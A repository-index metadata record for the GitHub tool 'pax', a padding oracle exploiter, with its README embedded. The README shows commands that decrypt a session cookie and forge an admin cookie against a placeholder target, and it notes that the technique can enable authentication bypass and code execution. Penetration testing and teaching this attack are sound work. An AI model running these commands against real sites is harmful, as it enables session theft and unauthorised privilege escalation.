{"id":15634625,"url":"https://github.com/liamg/pax","last_synced_at":"2025-04-14T22:37:33.827Z","repository":{"id":49896246,"uuid":"221998365","full_name":"liamg/pax","owner":"liamg","description":":skull: :unlock: CLI tool for PKCS7 padding oracle attacks","archived":false,"fork":false,"pushed_at":"2021-02-25T07:24:55.000Z","size":65,"stargazers_count":135,"open_issues_count":0,"forks_count":18,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-03-28T10:50:20.701Z","etag":null,"topics":["attack","crytpography","oracle","padding","padding-oracle","padding-oracle-attacks","pkcs7"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/liamg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":["liamg"]}},"created_at":"2019-11-15T20:30:12.000Z","updated_at":"2024-11-25T06:18:38.000Z","dependencies_parsed_at":"2022-09-10T06:10:12.648Z","dependency_job_id":null,"html_url":"https://github.com/liamg/pax","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/liamg%2Fpax","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/liamg%2Fpax/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/liamg%2Fpax/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/liamg%2Fpax/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/liamg","download_url":"https://codeload.github.com/liamg/pax/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248974755,"owners_count":21192189,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["attack","crytpography","oracle","padding","padding-oracle","padding-oracle-attacks","pkcs7"],"created_at":"2024-10-03T10:54:39.913Z","updated_at":"2025-04-14T22:37:33.793Z","avatar_url":"https://github.com/liamg.png","language":"Go","funding_links":["https://github.com/sponsors/liamg"],"categories":[],"sub_categories":[],"readme":"# pax\n\n[![Travis Build Status](https://travis-ci.org/liamg/pax.svg?branch=master)](https://travis-ci.org/liamg/pax)\n[![GoReportCard](https://goreportcard.com/badge/github.com/liamg/pax)](https://goreportcard.com/report/github.com/liamg/pax)\n\nExploit padding oracles for fun and profit!\n\nPax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:\n\n1. Obtain plaintext for a given piece of CBC encrypted data.\n2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.\n\nThis can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server. \n\nAs always, this tool should only be used on systems you own and/or have permission to probe!\n\n## Installation\n\nDownload from [releases](https://github.com/liamg/pax/releases), or install with Go:\n\n```bash\ngo get -u github.com/liamg/pax/cmd/pax\n```\n\n## Example Usage\n\nIf you find a suspected oracle, where the encrypted data is stored inside a cookie named `SESS`, you can use the following:\n\n```bash\npax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies \"SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D\"\n```\n\nThis will hopefully give you some plaintext, perhaps something like:\n\n```bash\n {\"user_id\": 456, \"is_admin\": false}\n```\n\nIt looks like you could elevate your privileges here!\n\nYou can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:\n\n```bash\npax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies \"SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D\" --plain-text '{\"user_id\": 456, \"is_admin\": true}'\n```\n\nThis will spit out another base64 encoded set of encrypted data, perhaps something like:\n\n```\ndGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=\n```\n\nNow you can open your browser and set the value of the `SESS` cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level. \n\n## How does this work?\n\nThe following are great guides on how this attack works:\n\n- https://robertheaton.com/2013/07/29/padding-oracle-attack/\n- https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fliamg%2Fpax","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fliamg%2Fpax","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fliamg%2Fpax/lists"}